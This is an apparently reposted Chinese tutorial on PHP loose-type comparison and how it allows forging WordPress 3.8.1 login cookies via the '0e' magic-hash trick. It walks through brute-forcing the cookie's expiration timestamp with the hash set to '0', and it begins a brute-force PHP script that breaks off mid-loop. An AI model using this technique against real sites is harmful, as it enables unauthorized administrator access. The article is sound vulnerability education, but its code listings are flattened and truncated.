PHP弱类型:WordPress Cookie伪造
PHP是弱类型语言,所以变量会因为使用场景的不同自动进行类型转换。PHP中用 == 以及 != 进行相等判断时,会自动进行类型转换,用 === 以及 !== 进行判断时不会自动转换类型。
1 php 2$a = 3; 3$b = '3vic'; 4var_dump($a == $b);//true5var_dump($a != $b);//false6var_dump($a === $b);//true7var_dump($a !== $b);//false8 ?>
说明:在PHP中字符串转换成整型时,如果是数字开头就会转换成前面的数字('3vic' -> 3),如果不是数字开头,那么就会转换成0('vic' -> 0)
2 WordPress代码
- WordPress 3.8.1 与 WordPress 3.8.2 部分代码区别
1 php 2// WordPress 3.8.13if ($hmac != $hash) {} 4// WordPress 3.8.25if ( hash_hmac('md5', $hmac, $key) !== hash_hmac('md5', $hash, $key) ) {} 6 ?>
- Cookie 组成
客户端后台只验证其中的一条Cookie,如下所示
wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly
其中Cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91
格式为 wordpress_
+ md5(siteurl
) 其中siteurl
为WordPress的网址,此处网站地址为http://www.test.ichunqiu,
md5加密后为c47f4a97d0321c1980bb76fc00d1e78f
,其它部分也可省。
类型 用户名 过期时间 登录成功服务器端赋予客户端的hash值
对应变量 | $username | $expiration | $hmac |
cookies | admin | 1433403595 | cf50f3b50eed94dd0fdc3d3ea2c7bbb |
- 分析验证登录
代码 wp-includes/pluggable.php 第543-549行
1 php 2$key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme); 3$hash = hash_hmac('md5', $username . '|' . $expiration, $key); 4if ( $hmac != $hash ) { 5 do_action('auth_cookie_bad_hash', $cookie_elements); 6returnfalse; 7 }
在代码所使用的变量中,通过改变客户端Cookie 的方式可控的有 $username 用户名,$expiration 有效期,又因为其中用户名是固定的,因此只有$expiration
是可控的,所以我们可以从改变 $expiration
的方法来改变$hash
。
- 结合PHP Hash 比较缺陷分析 WordPress
有以下几种可能使$hmac == $hash
为真,字符串完全相等或者 $hmac
等于0的同时 $hash
为以字符开头的字符串; 将客户端的Cookie中 $hmac
值改为0,然后在if ( $hmac != $hash ) {
的上面一行写入var_dump($hmac);die();
发现打印出来 $hmac
的结果是 string '0'
而不是int 0
, 那么有没有方法使字符串识别为整数呢,代码如下:
1 php 2var_dump('0' == '0e156464513131');//true
其中的 0e156464513131
会被识别为0乘以10的156464513131次方,还是得0;因此当 $hash
以0e开头后面全是数字时就会与 $hmac
的值为 '0' 时相等,所以我们可以将客户端的Cookie设置为类似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0
然后不断更新过期时间(现在1433403595的位置)的方法来碰撞服务器端,一旦 $hash
的值为0e开头后面全是数字即可验证通过。假设碰撞成功,就修改浏览器的Cookie,直接访问后台地址,就可以成功登陆后台。
3 测试脚本
通过改变客户端Cookie里过期时间的值,不断尝试登录后台,找出可以进入后台的时间戳,从而实现Cookie伪造登录后台。
1 php 2/* 3 4本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测 5传入两个值 6 WordPress 的主页 $host 7 管理员用户名 $root 8*/ 9header("Content-type:text/html;charset=utf-8"); 1011$host = 'http://xxx.xxx.xxx';//主页地址 结尾不带'/'12$root = 'user';//管理员用户名1314$url = $host.'/wp-admin/';//后台管理地址 15$sitehash=md5($host); 1617echo "\nWelcome\n\n"; 18//通过时间戳暴力破解cookie 实现伪造cookie19for($i=1500000000;$i$i
上一篇: 二、服务器优化(1)负载平衡
下一篇: SQL Server 总结复习(二)
推荐阅读
-
PHP源码分析-弱类型变量实现
-
PHP弱类型:WordPress Cookie伪造
-
php-弱类型的小陷阱
-
PHP弱门类的语言 和 JAVA计算 的强类型
-
php通过curl添加cookie伪造登陆抓取数据的方法_PHP
-
【问底】王帅:深入PHP内核(一)弱类型变量原理探究
-
关于php数组内存利用率低以及弱类型的实例讲解
-
PHP弱类型:WordPress Cookie伪造,wordpresscookie_PHP教程
-
PHP curl封装类(包含读取/写入/读写cookie/post/代理/伪造来源IP)
-
弱类型语言比强类型语言的优势、劣势、分别是什么?能用两种语言如 PHP 和 C# 举例论证吗?